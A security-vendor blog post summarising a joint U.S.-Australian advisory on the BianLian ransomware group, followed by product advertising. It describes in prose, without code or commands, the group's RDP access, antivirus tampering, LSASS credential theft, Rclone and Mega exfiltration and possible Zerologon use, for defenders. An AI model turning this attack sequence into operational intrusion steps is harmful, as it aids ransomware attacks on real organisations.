Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Tenable Blog

Subscribe

U.S. and Australian Agencies Publish Joint Cybersecurity Advisory on BianLian Ransomware Group

The FBI, ACSC and CISA have released a joint cybersecurity advisory discussing the BianLian ransomware group.

Background

As part of the #StopRansomware campaign, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. and the Australian Cyber Security Centre (ACSC) released a joint cybersecurity advisory (CSA AA23-136A) discussing the BianLian ransomware group. The advisory details the tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs) associated with the group and its corresponding malware.

Tweet from BetterCyber in July 2022 discussing the “new” ransomware group called BianLian

The BianLian ransomware operation emerged in June 2022 and over the past year has been responsible for a number of attacks targeting critical infrastructure in the U.S. and Australia. The group originally favored the double-extortion technique, a tactic where data was encrypted on the victim’s machines and also exfiltrated to the operator’s infrastructure, then teasers of the data are advertised on a leak website to publicly shame and entice the victim into paying the ransom. This technique was pioneered by the Maze ransomware group in 2019, a phenomenon we discuss in our Ransomware Ecosystem report.

While this technique has helped propel ransomware to new heights, according to the joint advisory, BianLian’s tactics changed to exfiltration only in January 2023, around the same time a free decryptor tool was released by Avast. BianLian’s shift aligns with findings in our 2022 Threat Landscape Report, where we observed an increase in the prominence of extortion-only attacks.

Analysis

Tactics, Techniques and Procedures

According to the cybersecurity advisory, BianLian gains initial access by using compromised Remote Desktop Protocol (RDP) credentials, which are assumed to have been obtained from initial access brokers or phishing attacks. Once the victim network is compromised, the group uses custom backdoors written in Go and tailor made for each victim. Additionally, the group will download remote management tools such as TeamViewer or Atera Agent, and create local administrator accounts to maintain persistence.

For defense evasion, the group disables Windows Defender and Anti-Malware Scan Interface (AMSI) using PowerShell and Windows Command Shell. BianLian actors also modify registry keys to disable tamper protection for Sophos services, which allows the group to uninstall antivirus services.

During the discovery phase, the group has been observed using tools such as Advanced Port Scanner and SoftPerfect Network Scanner to identify open ports across the victim network and discover shared folders. The group utilizes SharpShares to identify network shares and PingCastle to enumerate and map the victims Active Directory (AD).

To laterally move through the environment, the group gathers credentials from several sources. To find local, unsecured credentials, the group uses Windows Command Shell, and has been observed extracting credentials from the Local Security Authority Subsystem Service (LSASS) memory, brute forcing RDP passwords or checking for RDP vulnerabilities using RDP Recognizer, and attempting to access the NTDS.dit domain database.

For data exfiltration, the group uses file transfer protocol (FTP), Rclone and, in at least one instance, the file sharing service Mega to move sensitive data from the victim network.

Potential use of Zerologon (CVE-2020-1472)

According to the advisory, a forensic artifact found on a compromised system suggests that the group exploited CVE-2020-1472, a privilege escalation vulnerability known as Zerologon which can allow an attacker to compromise a domain controller. Zerologon has been widely favored by threat actors of all types since its disclosure. In fact, CVE-2020-1472 was featured in the top 5 vulnerabilities list two years in a row in the 2020 Threat Landscape Retrospective and 2021 Threat Landscape Retrospective reports.

Reduce your exposure by identifying affected systems

As we review the list of mitigations discussed in the advisory, our Tenable Identity Exposure (formerly Tenable.ad) solution can help organizations review Indicators of Exposure such as the unsecured configuration of Netlogon Protocol and insufficient hardening against ransomware attacks as well as utilize the Indicators of Attack for CVE-2020-1472. We highly recommend reviewing your AD environment as part of your ransomware preparedness strategy to focus on misconfigurations that may put your organization at risk.

The Tenable One Exposure Management Platform extends beyond traditional vulnerability management, which concentrates on the discovery and remediation of publicly disclosed Common Vulnerabilities and Exposures (CVEs). A foundational part of any exposure management program, Tenable One includes data about configuration issues, vulnerabilities and attack paths across a spectrum of assets and technologies — including identity solutions (e.g., Active Directory); cloud configurations and deployments; and web applications.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Related Articles

Cybersecurity News You Can Use

Enter your email and never miss timely alerts and security guidance from the experts at Tenable.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training